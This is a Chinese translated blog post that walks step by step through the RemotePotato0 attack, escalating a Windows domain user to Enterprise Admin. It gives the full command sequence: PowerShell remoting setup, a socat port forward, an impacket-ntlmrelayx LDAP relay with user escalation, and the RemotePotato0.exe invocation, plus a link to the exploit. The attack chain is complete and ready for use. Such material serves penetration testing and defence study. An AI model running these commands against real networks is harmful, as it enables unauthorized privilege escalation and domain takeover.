专栏首页鸿鹄实验室Remote Potato – From Domain User to Enterprise Admin

Remote Potato – From Domain User to Enterprise Admin

本文为翻译文,如有需要可查看原文:

https://pentestlab.blog/2021/05/04/remote-potato-from-domain-user-to-enterprise-admin/

前言

如需复现该漏洞,我们需要开启PS远程管理,开启方法如下

Enable-PSremoting
set-item wsman:localhost\client\trustedhosts -value

可以使用下面的命令来查看我们的目标配置:

Get-PSSessionConfiguration

如有需要,可将指定用户加入到指定组中:

所以该攻击的前提为:

  1. 具有Domain Administrator特权的用户实际上已登录到主机或通过远程桌面登录
  2. 攻击者已获得对主机的初始访问权限,或者已通过WinRM或SSH访问
  3. LDAP和SMB签名未配置

复现

首先使用下面的命令与目标主机建立链接

Enter-PSSession -ComputerName 10.0.0.2 -Authentication Negotiate -Credential $(get-credential)

然后使用socat 进行转发:

sudo stty -tostop
sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.2:9998 &

然后进行中继

 impacket-ntlmrelayx -t ldap://10.0.0.1 --no-wcf-server --escalate-user pentestlab

然后在目标机器上执行remote potato

RemotePotato0.exe -r 10.0.0.3 -p 9998

若成功则用户会被加入到Enterprise Admins组

此时便可以使用任何的横向移动工具获取system权限:

exploit地址:https://github.com/antonioCoco/RemotePotato0

本文分享自微信公众号 - 鸿鹄实验室(gh_a2210090ba3f),作者:鸿鹄实验室a

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-05-07

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • From Domain User to Enterprise Admin

    NTLM中继是一种众所周知的技术,主要用于在网络内的服务器上建立某种立足点或用于权限提升,这种攻击在没有为LDAP和SMB协议启用签名的网络中是可行的,此外使用...

    Al1ex
  • BizTalk Server 2006 Virtual Multi-Box Install

    One of the great improvements in BizTalk Server 2006 was the ease of the install...

    阿新
  • Red Hat安全公告—2016年4月

    在2016年3月份至2016年4月份,Red Hat CVE漏洞库发布了3个“重要”、“严重”等级的安全漏洞,并针对出现的安全漏洞发布了对应的B...

    嘉为科技
  • Windows Red Team Cheat Sheet

    PsExec, SmbExec, WMIExec, RDP, PTH in general.

    鸿鹄实验室
  • Deploy TiDB on AWS EKS

    how to deploy a TiDB cluster on AWS Elastic Kubernetes Service (EKS) ?

    杨漆
  • Windows 系统指令及服务

    ipconfig /all 获取ip地址 所在域 linux:ifconfig -a

    贝塔安全实验室
  • F1060 L2TP V**典型组网配置案例(独立LAC与客户LAC共存)

    本案例采用H3C HCL模拟器来模拟L2TP V**典型组网配置案例。内网和外网在网络拓扑图中已经有了明确标识。为了使得分支节点和移动办公通过V**接入内网访问...

    网络技术联盟站
  • F1060 L2TP V**典型组网配置案例(独立LAC与客户LAC共存)

    本案例采用H3C HCL模拟器来模拟L2TP V**典型组网配置案例。内网和外网在网络拓扑图中已经有了明确标识。为了使得分支节点和移动办公通过V**接入内网访问...

    网络技术联盟站
  • Red Hat安全公告—2016年8月

    在2016年7月份至2016年8月份 Red hat CVE漏洞库发布了8个“重要”“严重”等级的安全漏洞,针对出现的安全漏洞,发布了对应的Bugzilla。安...

    嘉为科技
  • Linux系列之学会使用CURL命令

    curl命令是一个利用URL规则在shell终端命令行下工作的文件传输工具;curl命令作为一款强力工具,curl支持包括HTTP、HTTPS、ftp等众多协议...

    SmileNicky
  • Red Hat安全公告—2016年5月

    在2016年4月份至2016年5月份Red hat CVE漏洞库发布了12个“重要”“严重”等级的安全漏洞,针对出现的安全漏洞,发布了对应的Bu...

    嘉为科技
  • The complete list of new features in MySQL 8.0

    原文出处:https://mysqlserverteam.com/the-complete-list-of-new-features-in-mysql-8-0/

    老叶茶馆
  • Failed to create or upgrade OLR

        对于Oracle 11g RAC 的安装,与Oracle 10g(clusterware)类似,grid 安装完毕后需要执行orainstroot.sh...

    Leshami
  • 讲真,Ansible 可以管理Windows?

    前言: 本文是我和李尧老师一起实验。李尧是红帽高级培训讲师,目前负责红帽中国区员工内部技术培训与认证。 一、Ansible能对windows做什么操作? Ans...

    魏新宇
  • Red Hat安全公告—2016年11月

    在2016年10月份至2016年11月份Red hat CVE漏洞库发布了7个“重要”“严重”等级的安全漏洞,针对出现的安全漏洞,发布了对应的Bugzilla。...

    嘉为科技
  • Red Hat安全公告—2016年12月

    在2016年11月份至2016年12月份Red hat CVE漏洞库发布了6个“重要”“严重”等级的安全漏洞,针对出现的安全漏洞,发布了对应的Bugzilla。...

    嘉为科技
  • 安装MySQL Enterprise Monitor

        MySQL Enterprise Monitor是专门为MySQL数据库而设计的一款企业级监控,能非常好地与MySQL各方面特性相结合,包括:MySQL...

    Leshami
  • Oracle cloud control 12c 如何修改sysman密码

        前阵子在虚拟机部署了Oracle Cloud Control 12c,事别几日,竟然忘记了登陆密码。主要是因为现在的Oracle有关的Software...

    Leshami
  • 部署带有DNS的FreeIPA服务端

    介绍在未部署统一身份管理系统时,管理员需要分别在每一台主机上为对应的系统管理员创建、维护账号和密码,无法进行统一的管理。当主机数量增加到一定程度后,也将难以进行...

    大数据杂货铺

扫码关注云+社区

领取腾讯云代金券